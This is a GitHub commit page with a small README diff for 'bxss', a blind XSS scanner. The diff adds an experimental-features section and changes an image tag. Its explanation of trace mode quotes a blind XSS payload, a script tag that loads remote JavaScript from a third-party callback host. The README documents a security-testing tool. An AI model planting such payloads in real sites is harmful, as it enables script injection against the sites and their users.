Skip to content

Commit 2b79dc6

Browse files
chore: updated README
1 parent cee9be2 commit 2b79dc6

File tree

1 file changed

+6
-1
lines changed

1 file changed

+6
-1
lines changed

README.md

Lines changed: 6 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -36,6 +36,11 @@ Bxss is a high-performance Blind XSS scanner that automates the detection of bli
3636

3737
---
3838

39+
## 🧪 Experimental Features
40+
- Trace mode (experimental)
41+
42+
---
43+
3944
## 📦 Installation
4045
```bash
4146
go install -v github.com/ethicalhackingplayground/bxss/v2/cmd/bxss@latest
@@ -73,7 +78,7 @@ go install -v github.com/ethicalhackingplayground/bxss/v2/cmd/bxss@latest
7378
## 📝 What is Trace mode?
7479
Trace mode is an experimental feature that allows you to track where the BlindXSS got triggered, some third party BlindXSS platforms such as (https://xss.report/)[https://xss.report/] allows you to specify custom parameters in you're payloads, this allows you to track where the BlindXSS got triggered, for example if you specify the parameter `url=https://somehost.com` in your payload, the tool will use the payload `'"><script src=https://xss.report/c/username?url=https://somehost.com></script>` this for testing and upon a trigger you will be able to inspect the DOM and see what host the BlindXSS got triggered from.
7580

76-
<img src="https://github.com/ethicalhackingplayground/bxss/blob/master/static/xss.report.png" width="200px" alt="Xss Report">
81+
<img src="https://github.com/ethicalhackingplayground/bxss/blob/master/static/xss.report.png" alt="Xss Report">
7782

7883
Make sure when assigning custom parameters in you're dashboard that you assign `url={LINK}` so bxss can automatically replace `{LINK}` with the actual URL.
7984

0 commit comments

Comments
 (0)